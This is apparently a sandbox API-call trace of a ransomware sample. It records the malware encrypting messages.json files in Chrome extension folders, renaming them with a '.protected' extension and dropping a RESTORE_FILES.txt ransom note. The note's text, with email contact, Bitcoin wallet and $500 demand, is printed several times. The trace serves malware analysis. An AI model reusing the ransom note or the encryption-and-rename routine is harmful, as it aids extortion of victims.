lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.418] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.418] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.419] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.419] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.419] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.419] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.420] CloseHandle (hObject=0x164) returned 1 [0079.420] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0079.420] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl") returned 142 [0079.420] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0079.420] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0079.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\*") returned 144 [0079.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\.") returned 144 [0079.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.420] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.421] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.421] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.421] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.421] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\..") returned 145 [0079.421] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.421] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.421] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0079.421] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.421] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.421] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.421] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0079.422] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0079.422] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json") returned 156 [0079.422] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.422] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf2, lpOverlapped=0x0) returned 1 [0079.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.423] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf2, lpOverlapped=0x0) returned 1 [0079.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.423] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.423] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.423] CloseHandle (hObject=0x168) returned 1 [0079.424] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.protected") returned 166 [0079.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.protected")) returned 1 [0079.424] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.424] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.424] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\RESTORE_FILES.txt") returned 160 [0079.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.425] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.425] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.426] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.426] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.426] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.426] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.426] CloseHandle (hObject=0x164) returned 1 [0079.426] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.426] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0079.426] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0079.426] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0079.426] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0079.426] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0079.426] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no") returned 142 [0079.426] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0079.426] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0079.426] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\*") returned 144 [0079.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.427] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.427] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.427] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.427] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\.") returned 144 [0079.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.427] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.427] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.427] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.427] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.427] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\..") returned 145 [0079.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.427] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.427] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0079.427] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.427] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.427] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.427] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0079.428] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.428] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0079.429] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.429] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json") returned 156 [0079.429] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.429] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.429] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.430] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.430] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.430] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.430] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.430] CloseHandle (hObject=0x168) returned 1 [0079.430] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.protected") returned 166 [0079.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.protected")) returned 1 [0079.431] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.431] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.431] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\RESTORE_FILES.txt") returned 160 [0079.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.432] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files 